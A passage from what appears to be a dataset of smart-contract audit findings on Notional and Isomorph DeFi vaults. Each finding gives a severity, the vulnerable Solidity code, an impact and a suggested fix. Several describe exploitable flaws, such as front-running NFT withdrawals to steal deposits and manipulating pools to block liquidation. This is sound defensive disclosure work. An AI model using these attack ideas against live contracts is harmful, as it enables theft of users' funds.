below\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n// Remove the line below\\n // value.\\n// Remove the line below\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n// Remove the line below\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n// Remove the line below\\n wrappedScaleFactor: wrappedScaleFactor,\\n// Add the line below\\n wrappedScaleFactor: underlyingScalingFactors[wrappedIndex], \\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n });\\n}\\n```\\nчWithin the Boosted 3 leverage vault, the balances are scaled before passing them to the stable math function for computation since the stable math function only works with balances that have been normalized to 18 decimals. If the scaling factor is incorrect, all the computations within the leverage vault will be incorrect, which affects almost all the vault functions.\\nFor instance, the `Boosted3TokenAuraVault.convertStrategyToUnderlying` function relies on the wrapped scaling factor for its computation under the hood. This function is utilized by Notional's `VaultConfiguration.calculateCollateralRatio` function to determine the value of the vault share when computing the collateral ratio. If the underlying result is wrong, the collateral ratio will be wrong too, and this leads to an array of issues such as users being liquidated prematurely or users being able to borrow more than they are allowed to.ч```\\nFile: Boosted3TokenPoolMixin.sol\\n function _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n wrappedScaleFactor: wrappedScaleFactor,\\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n });\\n }\\n```\\n -Boosted3TokenPoolUtils.sol : _redeem - updating the `totalBPTHeld , totalStrategyTokenGlobal` after `_unstakeAndExitPool` is not safeчmediumч_redeem function is used to claim the BPT amount using the strategy tokens.\\nIt is first calling the `_unstakeAndExitPool` function and then updating the `totalBPTHeld , totalStrategyTokenGlobal`\\n```\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n\\n if (bptClaim == 0) return 0;\\n\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n\\nFirst _unstakeAndExitPool is called and then totalBPTHeld and totalStrategyTokenGlobal are updated.чFirst update `totalBPTHeld and totalStrategyTokenGlobal` and then call the `_unstakeAndExitPool`чReentering during any of the function call inside `_unstakeAndExitPool` could be problematic. `stakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false)` `BalancerUtils._swapGivenIn`\\nWell it need deep study to analyze the impact, but I would suggest to update the balance first and then call the `_unstakeAndExitPool`ч```\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n\\n if (bptClaim == 0) return 0;\\n\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n -Unable to deploy new leverage vault for certain MetaStable PoolчmediumчNotional might have an issue deploying the new leverage vault for a MetaStable Pool that does not have Balancer Oracle enabled.\\n```\\nFile: MetaStable2TokenVaultMixin.sol\\nabstract contract MetaStable2TokenVaultMixin is TwoTokenPoolMixin {\\n constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n TwoTokenPoolMixin(notional_, params)\\n {\\n // The oracle is required for the vault to behave properly\\n (/* */, /* */, /* */, /* */, bool oracleEnabled) = \\n IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n require(oracleEnabled);\\n }\\n```\\nчRemove the Balancer Oracle check from the constructor.\\n```\\n constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n TwoTokenPoolMixin(notional_, params)\\n {\\n// Remove the line below\\n // The oracle is required for the vault to behave properly\\n// Remove the line below\\n (/* */, /* */, /* */, /* */, bool oracleEnabled) = \\n// Remove the line below\\n IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n// Remove the line below\\n require(oracleEnabled);\\n }\\n```\\nчNotional might have an issue deploying the new leverage vault for a MetaStable Pool that does not have Balancer Oracle enabled. Since Balancer Oracle has been deprecated, the Balancer Oracle will likely be disabled on the MetaStable Pool.ч```\\nFile: MetaStable2TokenVaultMixin.sol\\nabstract contract MetaStable2TokenVaultMixin is TwoTokenPoolMixin {\\n constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n TwoTokenPoolMixin(notional_, params)\\n {\\n // The oracle is required for the vault to behave properly\\n (/* */, /* */, /* */, /* */, bool oracleEnabled) = \\n IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n require(oracleEnabled);\\n }\\n```\\n -Possible division by zero depending on `TradingModule.getOraclePrice` return valuesчmediumчSome functions depending on `TradingModule.getOraclePrice` accept non-negative (int256 `answer`, int256 decimals) return values. In case any of those are equal to zero, division depending on `answer` or `decimals` will revert. In the worst case scenario, this will prevent the protocol from continuing operating.\\nThe function `TradingModule.getOraclePrice` properly validates that return values from Chainlink price feeds are positive.\\nNevertheless, `answer` may currently return zero, as it is calculated as `(basePrice * quoteDecimals * RATE_DECIMALS) / (quotePrice * baseDecimals);`, which can be truncated down to zero, depending on base/quote prices [1]. Additionally, `decimals` may in the future return zero, depending on changes to the protocol code, as the NatSpec states that this is a `number of `decimals` in the rate, currently hardcoded to 1e18` [2].\\nIf any of these return values are zero, calculations that use division depending on `TradingModule.getOraclePrice` will revert.\\nMore specifically:\\n[1]\\n1.1 `TradingModule.getLimitAmount`\\n```\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n```\\n\\nthat calls `TradingUtils._getLimitAmount`, which reverts if `oraclePrice` is `0`\\n```\\n oraclePrice = (oracleDecimals * oracleDecimals) / oraclePrice;\\n```\\n\\n[2] 2.1 `TwoTokenPoolUtils._getOraclePairPrice`\\n```\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n```\\n\\n2.2 `TradingModule.getLimitAmount`\\n```\\n require(oracleDecimals >= 0); /// @dev Chainlink decimals error\\n```\\n\\nthat calls `TradingUtils._getLimitAmount`, which reverts if `oracleDecimals` is `0`\\n```\\n limitAmount =\\n ((oraclePrice + \\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) / \\n oracleDecimals;\\n```\\n\\n2.3 `CrossCurrencyfCashVault.convertStrategyToUnderlying`\\n```\\n return (pvInternal * borrowTokenDecimals * rate) /\\n (rateDecimals * int256(Constants.INTERNAL_TOKEN_PRECISION));\\n```\\nчValidate that the return values are strictly positive (instead of non-negative) in case depending function calculations may result in division by zero. This can be either done on `TradingModule.getOraclePrice` directly or on the depending functions.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/trading/TradingModule.sol b/contracts/trading/TradingModule.sol\\nindex bfc8505..70b40f2 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/trading/TradingModule.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/trading/TradingModule.sol\\n@@ // Remove the line below\\n251,6 // Add the line below\\n251,9 @@ contract TradingModule is Initializable, UUPSUpgradeable, ITradingModule {\\n (basePrice * quoteDecimals * RATE_DECIMALS) /\\n (quotePrice * baseDecimals);\\n decimals = RATE_DECIMALS;\\n// Add the line below\\n\\n// Add the line below\\n require(answer > 0); /// @dev Chainlink rate error\\n// Add the line below\\n require(decimals > 0); /// @dev Chainlink decimals error\\n }\\n \\n function _hasPermission(uint32 flags, uint32 flagID) private pure returns (bool) {\\n@@ // Remove the line below\\n279,9 // Add the line below\\n282,6 @@ contract TradingModule is Initializable, UUPSUpgradeable, ITradingModule {\\n // prettier// Remove the line below\\nignore\\n (int256 oraclePrice, int256 oracleDecimals) = getOraclePrice(sellToken, buyToken);\\n \\n// Remove the line below\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n// Remove the line below\\n require(oracleDecimals >= 0); /// @dev Chainlink decimals error\\n// Remove the line below\\n\\n limitAmount = TradingUtils._getLimitAmount({\\n tradeType: tradeType,\\n sellToken: sellToken,\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol b/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\nindex 4954c59..6315c0a 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\n@@ // Remove the line below\\n76,10 // Add the line below\\n76,7 @@ library TwoTokenPoolUtils {\\n (int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n// Remove the line below\\n require(rate > 0);\\n// Remove the line below\\n require(decimals >= 0);\\n \\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n```\\nчIn the worst case, the protocol might stop operating.\\nAlbeit unlikely that `decimals` is ever zero, since currently this is a hardcoded value, it is possible that `answer` might be zero due to round-down performed by the division in `TradingModule.getOraclePrice`. This can happen if the quote token is much more expensive than the base token. In this case, `TradingModule.getLimitAmount` and depending calls, such as `TradingModule.executeTradeWithDynamicSlippage` might revert.ч```\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n```\\n -Malicious user can DOS pool and avoid liquidation by creating secondary liquidity pool for Velodrome token pairчhighчFor every Vault_Velo interaction the vault attempts to price the liquidity of the user. This calls priceLiquidity in the corresponding DepsoitReciept. The prices the underlying assets by swapping them through the Velodrome router. Velodrome can have both a stable and volatile pool for each asset pair. When calling the router directly it routes through the pool that gives the best price. In priceLiquidity the transaction will revert if the router routes through the wrong pool (i.e. trading the volatile pool instead of the stable pool). A malicious user can use this to their advantage to avoid being liquidated. They could manipulate the price of the opposite pool so that any call to liquidate them would route through the wrong pool and revert.\\n```\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n require(stablePool == stable, \"pricing occuring through wrong pool\" );\\n```\\n\\nDepositReceipt uses the getAmountOut call the estimate the amountOut. The router will return the best rate between the volatile and stable pool. If the wrong pool give the better rate then the transaction will revert. Since pricing is called during liquidation, a malicious user could manipulate the price of the wrong pool so that it returns the better rate and always reverts the liquidation call.чInstead of quoting from the router, query the correct pool directly:\\n```\\n uint256 amountOut; //amount received by trade\\n- bool stablePool; //if the traded pool is stable or volatile.\\n\\n- (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n- require(stablePool == stable, \"pricing occuring through wrong pool\" );\\n+ address pair;\\n\\n+ pair = router.pairFor(token1, USDC, stable)\\n+ amountOut = IPair(pair).getAmountOut(HUNDRED_TOKENS, token1)\\n```\\nчMalicious user can avoid liquidationч```\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n require(stablePool == stable, \"pricing occuring through wrong pool\" );\\n```\\n -Users are unable close or add to their Lyra vault positions when price is stale or circuit breaker is trippedчhighчUsers are unable close or add to their Lyra vault positions when price is stale or circuit breaker is tripped. This is problematic for a few reasons. First is that the circuit breaker can be tripped indefinitely which means their collateral could be frozen forever and they will be accumulating interest the entire time they are frozen. The second is that since they can't add any additional collateral to their loan, the loan may end up being underwater by the time the price is no longer stale or circuit breaker is no longer tripped. They may have wanted to add more assets and now they are liquidated, which is unfair as users who are liquidated are effectively forced to pay a fee to the liquidator.\\n```\\nfunction _checkIfCollateralIsActive(bytes32 _currencyKey) internal view override {\\n \\n //Lyra LP tokens use their associated LiquidityPool to check if they're active\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n bool isStale;\\n uint circuitBreakerExpiry;\\n //ignore first output as this is the token price and not needed yet.\\n (, isStale, circuitBreakerExpiry) = LiquidityPool.getTokenPriceWithCheck();\\n require( !(isStale), \"Global Cache Stale, can't trade\");\\n require(circuitBreakerExpiry < block.timestamp, \"Lyra Circuit Breakers active, can't trade\");\\n}\\n```\\n\\nThe above lines are run every time a user a user tries to interact with the vault. Currently this is overly restrictive and can lead to a lot of undesired situations, as explained in the summary.чThe contract is frozen when price is stale or circuit breaker is tripped to prevent price manipulation. While it should restrict a majority of actions there are a two that don't need any price validation. If a user wishes to close out their entire loan then there is no need for price validation because the user has no more debt and therefore doesn't need to maintain any level of collateralization. The other situation is if a user adds collateral to their vault and doesn't take out any more loans. In this scenario, the collateralization can only increase, which means that price validation is not necessary.\\nI recommend the following changes to closeLoan:\\n```\\n- _checkIfCollateralIsActive(currencyKey);\\n uint256 isoUSDdebt = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n require( isoUSDdebt >= _USDToVault, \"Trying to return more isoUSD than borrowed!\");\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n+ //only need to check collateral value if user has remaining debt\\n+ _checkIfCollateralIsActive(currencyKey);\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , \"Remaining debt fails to meet minimum margin!\");\\n }\\n```\\n\\nI recommend removing liquidation threshold check from increaseCollateralAmount:\\n```\\n //debatable check begins here \\n- uint256 totalCollat = collateralPosted[_collateralAddress][msg.sender] + _colAmount;\\n- uint256 colInUSD = priceCollateralToUSD(currencyKey, totalCollat);\\n- uint256 USDborrowed = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n- uint256 borrowMargin = (USDborrowed * liquidatableMargin) / LOAN_SCALE;\\n- require(colInUSD >= borrowMargin, \"Liquidation margin not met!\");\\n //debatable check ends here\\n```\\nчFrozen assets, unfair interest accumulation and unfair liquidationsч```\\nfunction _checkIfCollateralIsActive(bytes32 _currencyKey) internal view override {\\n \\n //Lyra LP tokens use their associated LiquidityPool to check if they're active\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n bool isStale;\\n uint circuitBreakerExpiry;\\n //ignore first output as this is the token price and not needed yet.\\n (, isStale, circuitBreakerExpiry) = LiquidityPool.getTokenPriceWithCheck();\\n require( !(isStale), \"Global Cache Stale, can't trade\");\\n require(circuitBreakerExpiry < block.timestamp, \"Lyra Circuit Breakers active, can't trade\");\\n}\\n```\\n -Anyone can withdraw user's Velo Deposit NFT after approval is given to depositorчhighч`Depositor#withdrawFromGauge` is a public function that can be called by anyone which transfers token to `msg.sender`. `withdrawFromGauge` burns the NFT to be withdrawn, which means that `Depositor` must either be approved or be in possession of the NFT. Since it doesn't transfer the NFT to the contract before burning the user must either send the NFT to the `Depositor` or `approve` the `Depositor` in a separate transaction. After the NFT is either transferred or approved, a malicious user could withdraw the NFT for themselves.\\n```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n\\n`Depositor#withdrawFromGauge` allows anyone to call it, burning the NFT and sending `msg.sender` the withdrawn tokens.\\n```\\nfunction burn(uint256 _NFTId) external onlyMinter{\\n require(_isApprovedOrOwner(msg.sender, _NFTId), \"ERC721: caller is not token owner or approved\");\\n delete pooledTokens[_NFTId];\\n delete relatedDepositor[_NFTId];\\n _burn(_NFTId);\\n}\\n```\\n\\n`Depositor` calls `DepositReceipt_Base#burn`, which means that it must be either the owner or approved for the NFT. Since `Depositor#withdrawFromGauge` doesn't transfer the NFT from the user, this must happen in a separate transaction. Between the user approval/transfer and them calling `Depositor#withdrawFromGauge` a malicious user could call `Depositor#withdrawFromGauge` first to withdraw the NFT and steal the users funds. This would be very easy to automate with a bot.\\nExample: `User A` deposits 100 underlying into their `Depositor` and is given `Token A` which represents their deposit. After some time they want to redeem `Token A` so they `Approve` their `Depositor` for `Token A`. `User B` sees the approval and quickly calls `Depositor#withdrawFromGauge` to withdraw `Token A`. `User B` is sent the 100 tokens and `Token A` is burned from `User A`.чOnly allow owner of NFT to withdraw it:\\n```\\n function withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n+ require(depositReceipt.ownerOf(_NFTId) == msg.sender);\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n }\\n```\\nчUsers attempting to withdraw can have their funds stolenч```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n -Swapping 100 tokens in DepositReceipt_ETH and DepositReciept_USDC breaks usage of WBTC LP and other high value tokensчhighчDepositReceipt_ETH and DepositReciept_USDC checks the value of liquidity by swapping 100 tokens through the swap router. WBTC is a good example of a token that will likely never work as LP due to the massive value of swapping 100 WBTC. This makes DepositReceipt_ETH and DepositReciept_USDC revert during slippage checks after calculating amount out. As of the time of writing this, WETH also experiences a 11% slippage when trading 100 tokens. Since DepositReceipt_ETH only supports 18 decimal tokens, WETH/USDC would have to use DepositReciept_USDC, resulting in WETH/USDC being incompatible. The fluctuating liquidity could also make this a big issue as well. If liquidity reduces after deposits are made, user deposits could be permanently trapped.\\n```\\n //check swap value of 100tokens to USDC to protect against flash loan attacks\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n```\\n\\nThe above lines try to swap 100 tokens from token1 to USDC. In the case of WBTC 100 tokens is a monstrous amount to swap. Given the low liquidity on the network, it simply won't function due to slippage requirements.\\n```\\nfunction _priceCollateral(IDepositReceipt depositReceipt, uint256 _NFTId) internal view returns(uint256){ \\n uint256 pooledTokens = depositReceipt.pooledTokens(_NFTId); \\n return( depositReceipt.priceLiquidity(pooledTokens));\\n}\\n\\nfunction totalCollateralValue(address _collateralAddress, address _owner) public view returns(uint256){\\n NFTids memory userNFTs = loanNFTids[_collateralAddress][_owner];\\n IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 totalPooledTokens;\\n for(uint256 i =0; i < NFT_LIMIT; i++){\\n //check if each slot contains an NFT\\n if (userNFTs.ids[i] != 0){\\n totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n }\\n }\\n return(depositReceipt.priceLiquidity(totalPooledTokens));\\n}\\n```\\n\\nOne of the two functions above are used to price LP for every vault action on Vault_Velo. If liquidity is sufficient when user deposits but then drys up after, the users deposit would be permanently trapped in the in the vault. In addition to this liquidation would also become impossible causing the protocol to assume bad debt.\\nThis could also be exploited by a malicious user. First they deposit a large amount of collateral into the Velodrome WBTC/USDC pair. They take a portion of their LP and take a loan against it. Now they withdraw the rest of their LP. Since there is no longer enough liquidity to swap 100 tokens with 5% slippage, they are now safe from liquidation, allowing a risk free loan.чChange the number of tokens to an immutable, so that it can be set individually for each token. Optionally you can add checks (shown below) to make sure that the number of tokens being swapped will result in at least some minimum value of USDC is received. Similar changes should be made for DepositReceipt_ETH:\\n```\\nconstructor(string memory _name, \\n string memory _symbol, \\n address _router, \\n address _token0,\\n address _token1,\\n uint256 _tokensToSwap,\\n bool _stable,\\n address _priceFeed) \\n ERC721(_name, _symbol){\\n\\n // rest of code\\n\\n if (keccak256(token0Symbol) == keccak256(USDCSymbol)){\\n require( IERC20Metadata(_token1).decimals() == 18, \"Token does not have 18dp\");\\n\\n+ (amountOut,) = _router.getAmountOut(_tokensToSwap, token1, USDC);\\n\\n+ //swapping tokens must yield at least 100 USDC\\n+ require( amountOut >= 1e8);\\n+ tokensToSwap = _tokensToSwap;\\n }\\n else\\n { \\n bytes memory token1Symbol = abi.encodePacked(IERC20Metadata(_token1).symbol());\\n require( keccak256(token1Symbol) == keccak256(USDCSymbol), \"One token must be USDC\");\\n require( IERC20Metadata(_token0).decimals() == 18, \"Token does not have 18dp\");\\n \\n+ (amountOut, ) = _router.getAmountOut(_tokensToSwap, token0, USDC);\\n\\n+ //swapping tokens must yield at least 100 USDC\\n+ require( amountOut >= 1e8);\\n+ tokensToSwap = _tokensToSwap;\\n }\\n```\\nчLPs that contain high value tokens will be unusable at best and freeze user funds or be abused at the worst caseч```\\n //check swap value of 100tokens to USDC to protect against flash loan attacks\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n```\\n -Lyra vault underestimates the collateral valueчmediumчLyra vault subtracts the withdrawal fee while calculating the collateral value in USD, and it does not match the actual Lyra Pool implementation.\\nThe user's collateral value is estimated using the function `priceCollateralToUSD()` at `Vault_Lyra.sol#L77` as follows.\\n```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice();\\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee\\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n\\nSo it is understood that the withdrawal fee is removed to get the reasonable value of the collateral. But according to the Lyra Pool implementation, the token price used for withdrawal is calculated using the function `_getTotalBurnableTokens`. And the function `_getTotalBurnableTokens` is as belows.\\n```\\nfunction _getTotalBurnableTokens()\\n internal\\n returns (\\n uint tokensBurnable,\\n uint tokenPriceWithFee,\\n bool stale\\n )\\n {\\n uint burnableLiquidity;\\n uint tokenPrice;\\n (tokenPrice, stale, burnableLiquidity) = _getTokenPriceAndStale();\\n\\n if (optionMarket.getNumLiveBoards() != 0) {\\n tokenPriceWithFee = tokenPrice.multiplyDecimal(DecimalMath.UNIT - lpParams.withdrawalFee);\\n } else {\\n tokenPriceWithFee = tokenPrice;//@audit withdrawalFee is not applied if there are no live borads\\n }\\n\\n return (burnableLiquidity.divideDecimal(tokenPriceWithFee), tokenPriceWithFee, stale);\\n }\\n```\\n\\nFrom the code, it is clear that the withdrawal fee is subtracted only when the related option market has live boards. Because `Vault_Lyra.sol` applies a withdrawal fee all the time to price the collateral, it means the user's collateral is under-valued.чMake sure to apply withdrawal fee consistent to how Lyra pool does.чUser's collaterals are under-valued than reasonable and might get to a liquidatable status sooner than expected. A liquidator can abuse this to get an unfair profit by liquidating the user's collateral with the under-estimated value and withdrawing it from the Lyra pool without paying a withdrawal fee.ч```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice();\\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee\\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n -Bad debt may persist even after complete liquidation in Velo Vault due to truncationчmediumчWhen liquidating a user, if all their collateral is taken but it is not valuable enough to repay the entire loan they would be left with remaining debt. This is what is known as bad debt because there is no collateral left to take and the user has no obligation to pay it back. When this occurs, the vault will forgive the user's debts, clearing the bad debt. The problem is that the valuations are calculated in two different ways which can lead to truncation issue that completely liquidates a user but doesn't clear their bad debt.\\n```\\n uint256 totalUserCollateral = totalCollateralValue(_collateralAddress, _loanHolder);\\n uint256 proposedLiquidationAmount;\\n { //scope block for liquidationAmount due to stack too deep\\n uint256 liquidationAmount = viewLiquidatableAmount(totalUserCollateral, 1 ether, isoUSDBorrowed, liquidatableMargin);\\n require(liquidationAmount > 0 , \"Loan not liquidatable\");\\n proposedLiquidationAmount = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n require(proposedLiquidationAmount <= liquidationAmount, \"excessive liquidation suggested\");\\n }\\n uint256 isoUSDreturning = proposedLiquidationAmount*LIQUIDATION_RETURN/LOAN_SCALE;\\n if(proposedLiquidationAmount >= totalUserCollateral){\\n //@audit bad debt cleared here\\n }\\n```\\n\\nThe primary check before clearing bad debt is to check if `proposedLiquidationAmount >= totalUserCollateral`. The purpose of this check is to confirm that all of the user's collateral is being liquidated. The issue is that each value is calculated differently.\\n```\\nfunction totalCollateralValue(address _collateralAddress, address _owner) public view returns(uint256){\\n NFTids memory userNFTs = loanNFTids[_collateralAddress][_owner];\\n IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 totalPooledTokens;\\n for(uint256 i =0; i < NFT_LIMIT; i++){\\n //check if each slot contains an NFT\\n if (userNFTs.ids[i] != 0){\\n totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n }\\n }\\n return(depositReceipt.priceLiquidity(totalPooledTokens));\\n}\\n```\\n\\n`totalCollateralValue` it used to calculate `totalUserCollateral`. In this method the pooled tokens are summed across all NFT's then they are priced. This means that the value of the liquidity is truncated exactly once.\\n```\\nfunction _calculateProposedReturnedCapital(\\n address _collateralAddress, \\n CollateralNFTs calldata _loanNFTs, \\n uint256 _partialPercentage\\n ) internal view returns(uint256){\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 proposedLiquidationAmount;\\n require(_partialPercentage <= LOAN_SCALE, \"partialPercentage greater than 100%\");\\n for(uint256 i = 0; i < NFT_LIMIT; i++){\\n if(_loanNFTs.slots[i] < NFT_LIMIT){\\n if((i == NFT_LIMIT -1) && (_partialPercentage > 0) && (_partialPercentage < LOAN_SCALE) ){\\n //final slot is NFT that will be split if necessary\\n 